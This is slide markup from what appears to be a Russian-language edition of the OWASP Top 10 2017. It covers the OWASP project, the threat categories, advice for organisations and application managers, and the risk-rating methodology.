                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>бесплатно и в открытом доступе предлагает:</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стандарты и инструменты для обеспечения безопасности приложений;</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smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>полные версии книг по </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>тестированию безопасности приложений, разработке безопасного кода, а также оценке безопасности кода;</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презентации и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>видео</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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7"/>
                        </a:rPr>
                        <a:t>памятки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> по большинству распространенных вопросов;</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стандартные требования к безопасности и библиотеки;</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8"/>
                        </a:rPr>
                        <a:t>локальные отделения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передовые исследования;</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крупные </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>конференции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10"/>
                        </a:rPr>
                        <a:t>списки рассылок</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
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Более подробная информация доступна на сайте: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</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Все инструменты, документы, видео, презентации и отделения OWASP являются бесплатными и открытыми для тех, кто заинтересован в улучшении безопасности приложений. </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Фонд выступает за подход к безопасности приложений с точки зрения проблемы людей, процессов и технологий, поскольку для наиболее эффективного обеспечения безопасности приложений требуются улучшения во всех этих областях.</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OWASP представляет собой новый тип организации. Наша независимость от коммерческого влияния позволяет нам предоставлять беспристрастные, практические и эффективные данные по безопасности приложений. </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OWASP не связан ни с одной технологической компанией, хотя поддерживает использование технологий промышленной безопасности. OWASP выпускает большое количество материалов, действуя прозрачно и открыто, а также всегда готов к сотрудничеству.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Фонд OWASP является некоммерческой организацией, что обеспечивает проекту долгосрочный успех. Почти все связанные с OWASP люди являются добровольцами, включая членов совета OWASP, руководителей отделений и проектов, а также участников проекта.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="800" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Мы поддерживаем инновационные исследования в области безопасности, предоставляя гранты и инфраструктуру.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Присоединяйтесь к нам!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0"/>
              <a:t>С</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354074714"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1432560"/>
          <a:ext cx="3383280" cy="639318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ЧН</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Что нового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 приложений</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ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Т10</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Топ-10 угроз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r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:b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OWASP – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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аутентификации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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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данных.</a:t>
                      </a:r>
                      <a:endPar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Внешние сущности XML (XXE)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контроля доступа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Некорректная настройка параметров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Межсайтовое выполнение сценариев (XSS</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Небезопасная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Использование компонентов с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известными уязвимостями .…………………………………………………</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5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мониторинга………………………………………………………………………</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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разработчикам…………………..….…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тестировщикам</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организациям……………………….……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менеджерам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приложений.....</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Об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угрозах</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+ФР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 факторах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риска</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+МД</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Методология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данные…………………………..…..…</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Благодарности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3245857904"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990601"/>
          <a:ext cx="6858000" cy="817019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1">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Внедрите программу обеспечения безопасности приложений сейчас</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9">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Безопасность приложений больше не является факультативной. Под давлением регуляторов и растущего количества атак организации должны разрабатывать эффективные процессы и средства обеспечения безопасности своих приложений и API. Многие организации стараются справиться с огромным количеством уязвимостей в невероятном объеме кода уже выпущенных приложений и API. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="91440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OWASP рекомендует разработать программу обеспечения безопасности, чтобы проанализировать и улучшить безопасность приложений и API. Обеспечение безопасности требует эффективного взаимодействия различных подразделений организации, включая аудиторов, разработчиков, руководителей и администраторов. Безопасность должна быть наглядной и измеряемой, чтобы можно было увидеть и понять состояние безопасности приложения. Сделайте акцент на работах и результатах, которые реально улучшат безопасность и устранят или снизят риски.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Модель обеспечения безопасности ПО</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безопасности приложений для руководителей ИБ</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от OWASP содержат большинство ключевых активностей из списка.</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8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+О</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Что делать организациям</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3102427996"/>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Обеспечение визуального контроля</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sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Управление жизненным циклом приложения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 относятся к наиболее сложным системам, которые люди постоянно создают и обслуживают. Администрирование приложений необходимо поручать ИТ-специалистам, которые будут отвечать за весь их жизненный цикл. Мы предлагаем назначать менеджеров приложений, которые будут отвечать за технические аспекты приложения на протяжении его жизненного цикла, начиная со сбора требований и заканчивая выводом систем из эксплуатации, про что так часто забывают. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a: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endPar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+М</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Что делать менеджерам приложений</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2918228228"/>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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Степень опасности уязвимостей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Методика оценки степени опасности уязвимостей для списка Топ-10 основана на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Методике оценки рисков OWASP</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Для каждой категории угроз оценивались характерные для стандартного веб-приложения недостатки, исходя из факторов их вероятности и риска. Затем угрозы группировались по степени опасности для веб-приложений. Список уязвимостей обновляется с каждым новым выпуском Топ-10, по мере изменения среды и условий эксплуатации.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a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Методика оценки рисков OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> описывает множество факторов, помогающих оценить опасность обнаруженной уязвимости. Топ-10 предоставляет лишь обобщенные данные, а не информацию о конкретных уязвимостях в реальных приложениях и API. Поэтому никто кроме владельца или менеджера приложения не сможет точно оценить риски, угрожающие конкретному приложению. Только вы обладаете наиболее полными знаниями, чтобы судить о критичности ваших приложений и данных, наличии возможных угроз, а также принципах работы и использования вашей системы.</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Наша методика определяет три фактора вероятности наличия уязвимости (распространенность, сложность обнаружения и сложность эксплуатации) и один фактор ее опасности (технические последствия). Уровень критичности каждого фактора классифицируется от 1 (низкий) до 3 (высокий) и определяется специальными терминами. Распространенность, как правило, не требует расчета. Статистические данные по распространенности, предоставленные организациями (см. Благодарности на стр. 24), были обработаны и интегрированы в список Топ-10. Затем эти данные были объединены с двумя другими факторами вероятности (сложность обнаружения и сложность эксплуатации) для расчета вероятности наличия каждой уязвимости. Полученное значение было умножено на среднее значение тяжести технических последствий для определения совокупной опасности каждого пункта списка Топ-10 (чем выше результат, тем выше опасность). Сложность обнаружения и эксплуатации, а также последствия рассчитывались на основе CVE, связанных с каждой категорией Топ-10.</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данный подход не учитывает источники угроз, а также технические особенности отдельных приложений. Любой из этих факторов может в значительной степени повлиять на общую вероятность обнаружения и эксплуатации злоумышленником уязвимости. Классификация также не учитывает реальные последствия для бизнеса. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Каждая организация</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должна сама решить насколько небезопасными могут быть ее приложения и API с учетом сложившихся традиций, отрасли применения и нормативной базы. В задачи Топ-10 OWASP не входит анализ угроз для конкретной организации.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Ниже представлен расчет степени опасности </a:t>
                      </a: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A6:2017-Некорректной настройки параметров безопасности</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269070329"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="5775521"/>
          <a:ext cx="6629400" cy="28225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sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Зависит от приложения</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Сложность эксплуатации</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ПРОСТО: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Распространенность</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ОЧ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ЕНЬ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>РАСПРОСТР: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" baseline="0" dirty="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Сложность обнаружения</a:t>
                      </a:r>
                    </a:p>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ПРОСТО: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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Технические</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>УМЕРЕННЫЕ: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Зависит от бизнеса</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dirty="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ru-RU" sz="1800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="1800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1400" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>В </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>среднем</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="1400" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B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1800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="2400" b="1"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48686" y="8155791"/>
            <a:ext cx="1039054" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>6.0</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1"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+У</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Об угрозах</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="70906" y="5910536"/>
            <a:ext cx="6238413" cy="390006"/>
            <a:chOff x="-88119" y="1058047"/>
            <a:chExt cx="6238413" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-88119" y="1058047"/>
              <a:ext cx="6238413" cy="386519"/>
              <a:chOff x="-88119" y="1070390"/>
              <a:chExt cx="6238413" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5257799" y="1070390"/>
                <a:ext cx="892495"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88119" y="1073624"/>
                <a:ext cx="692817" cy="297517"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">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Векторы</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Недостатки</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endPar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4"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626253734"/>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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Сводная таблица угроз Топ-10</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00" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Таблица ниже содержит сводную информацию о Топ-10 угроз безопасности приложений 2017 г., а также факторы риска, назначенные для каждой из угроз. Эти факторы определялись на основе доступной статистики и опыта команды Топ-10 OWASP. Чтобы рассчитать риски для конкретного приложения или организации, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" u="sng" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>необходимо определить специфичные для них источники угроз и последствия для бизнеса</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Даже критические недостатки ПО могут не представлять серьезной опасности, если отсутствуют источники угроз или последствия для бизнеса являются незначительными для рассматриваемых активов.</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721126734"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2231740"/>
          <a:ext cx="6842248" cy="411225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531918">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>УГРОЗЫ</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sz="770" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Уров</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>опасн</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="770" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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25089">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A1:2017-Внедрение</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sz="80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48897">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A2:2017-Аутентификация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48897">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A3:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="800" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
